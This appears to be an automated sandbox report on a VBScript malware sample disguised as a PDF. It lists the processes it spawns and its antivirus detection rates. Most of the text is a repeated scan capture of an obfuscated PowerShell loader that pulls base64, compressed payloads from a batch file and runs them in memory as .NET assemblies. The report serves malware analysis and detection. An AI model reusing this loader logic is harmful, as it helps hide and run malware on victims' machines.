Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Hellas,pdf.vbs"

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$oxfei.CopyTo($jlpna);$oxfei.Dispose();$ktyqw.Dispose();$jlpna.Dispose();$jlpna.ToArray();}function vmeup($param_var,$param2_var){$uqemb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);$lwbcv=$uqemb.EntryPoint;$lwbcv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $plpql;$glapx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($plpql).Split([Environment]::NewLine);foreach ($uhw in $glapx) {if ($uhw.StartsWith(':: ')){$uvpoz=$uhw.Substring(3);break;}}$kcoaj=[string[]]$uvpoz.Split('\');$ycspq=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[0])));$gtipu=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[1])));vmeup $ycspq $null;vmeup $gtipu (,[string[]] ('%*'));@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recyclebin",
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$oxfei.CopyTo($jlpna);$oxfei.Dispose();$ktyqw.Dispose();$jlpna.Dispose();$jlpna.ToArray();}function vmeup($param_var,$param2_var){$uqemb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);$lwbcv=$uqemb.EntryPoint;$lwbcv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $plpql;$glapx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($plpql).Split([Environment]::NewLine);foreach ($uhw in $glapx) {if ($uhw.StartsWith(':: ')){$uvpoz=$uhw.Substring(3);break;}}$kcoaj=[string[]]$uvpoz.Split('\');$ycspq=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[0])));$gtipu=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[1])));vmeup $ycspq $null;vmeup $gtipu (,[string[]] ('%*'));@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recyclebin",
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$oxfei.CopyTo($jlpna);$oxfei.Dispose();$ktyqw.Dispose();$jlpna.Dispose();$jlpna.ToArray();}function vmeup($param_var,$param2_var){$uqemb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);$lwbcv=$uqemb.EntryPoint;$lwbcv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $plpql;$glapx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($plpql).Split([Environment]::NewLine);foreach ($uhw in $glapx) {if ($uhw.StartsWith(':: ')){$uvpoz=$uhw.Substring(3);break;}}$kcoaj=[string[]]$uvpoz.Split('\');$ycspq=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[0])));$gtipu=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[1])));vmeup $ycspq $null;vmeup $gtipu (,[string[]] ('%*'));@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recyclebin",
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$oxfei.CopyTo($jlpna);$oxfei.Dispose();$ktyqw.Dispose();$jlpna.Dispose();$jlpna.ToArray();}function vmeup($param_var,$param2_var){$uqemb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);$lwbcv=$uqemb.EntryPoint;$lwbcv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $plpql;$glapx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($plpql).Split([Environment]::NewLine);foreach ($uhw in $glapx) {if ($uhw.StartsWith(':: ')){$uvpoz=$uhw.Substring(3);break;}}$kcoaj=[string[]]$uvpoz.Split('\');$ycspq=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[0])));$gtipu=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[1])));vmeup $ycspq $null;vmeup $gtipu (,[string[]] ('%*'));@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recyclebin",
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$oxfei.CopyTo($jlpna);$oxfei.Dispose();$ktyqw.Dispose();$jlpna.Dispose();$jlpna.ToArray();}function vmeup($param_var,$param2_var){$uqemb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);$lwbcv=$uqemb.EntryPoint;$lwbcv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $plpql;$glapx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($plpql).Split([Environment]::NewLine);foreach ($uhw in $glapx) {if ($uhw.StartsWith(':: ')){$uvpoz=$uhw.Substring(3);break;}}$kcoaj=[string[]]$uvpoz.Split('\');$ycspq=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[0])));$gtipu=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[1])));vmeup $ycspq $null;vmeup $gtipu (,[string[]] ('%*'));@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recyclebin",
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$oxfei.CopyTo($jlpna);$oxfei.Dispose();$ktyqw.Dispose();$jlpna.Dispose();$jlpna.ToArray();}function vmeup($param_var,$param2_var){$uqemb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);$lwbcv=$uqemb.EntryPoint;$lwbcv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $plpql;$glapx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($plpql).Split([Environment]::NewLine);foreach ($uhw in $glapx) {if ($uhw.StartsWith(':: ')){$uvpoz=$uhw.Substring(3);break;}}$kcoaj=[string[]]$uvpoz.Split('\');$ycspq=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[0])));$gtipu=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[1])));vmeup $ycspq $null;vmeup $gtipu (,[string[]] ('%*'));@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recyclebin",
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$oxfei.CopyTo($jlpna);$oxfei.Dispose();$ktyqw.Dispose();$jlpna.Dispose();$jlpna.ToArray();}function vmeup($param_var,$param2_var){$uqemb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);$lwbcv=$uqemb.EntryPoint;$lwbcv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $plpql;$glapx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($plpql).Split([Environment]::NewLine);foreach ($uhw in $glapx) {if ($uhw.StartsWith(':: ')){$uvpoz=$uhw.Substring(3);break;}}$kcoaj=[string[]]$uvpoz.Split('\');$ycspq=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[0])));$gtipu=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[1])));vmeup $ycspq $null;vmeup $gtipu (,[string[]] ('%*'));@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recyclebin",
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$oxfei.CopyTo($jlpna);$oxfei.Dispose();$ktyqw.Dispose();$jlpna.Dispose();$jlpna.ToArray();}function vmeup($param_var,$param2_var){$uqemb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);$lwbcv=$uqemb.EntryPoint;$lwbcv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $plpql;$glapx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($plpql).Split([Environment]::NewLine);foreach ($uhw in $glapx) {if ($uhw.StartsWith(':: ')){$uvpoz=$uhw.Substring(3);break;}}$kcoaj=[string[]]$uvpoz.Split('\');$ycspq=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[0])));$gtipu=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[1])));vmeup $ycspq $null;vmeup $gtipu (,[string[]] ('%*'));@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recyclebin",
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$oxfei.CopyTo($jlpna);$oxfei.Dispose();$ktyqw.Dispose();$jlpna.Dispose();$jlpna.ToArray();}function vmeup($param_var,$param2_var){$uqemb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var);$lwbcv=$uqemb.EntryPoint;$lwbcv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $plpql;$glapx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($plpql).Split([Environment]::NewLine);foreach ($uhw in $glapx) {if ($uhw.StartsWith(':: ')){$uvpoz=$uhw.Substring(3);break;}}$kcoaj=[string[]]$uvpoz.Split('\');$ycspq=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[0])));$gtipu=htdus (zdtgt ([Convert]::FromBase64String($kcoaj[1])));vmeup $ycspq $null;vmeup $gtipu (,[string[]] ('%*'));@{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recyclebin",

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Hellas,pdf.vbs	Virustotal: Detection: 33%
Source: Hellas,pdf.vbs	ReversingLabs: Detection: 22%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Hellas,pdf.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\WordDoc.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\WordDoc.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
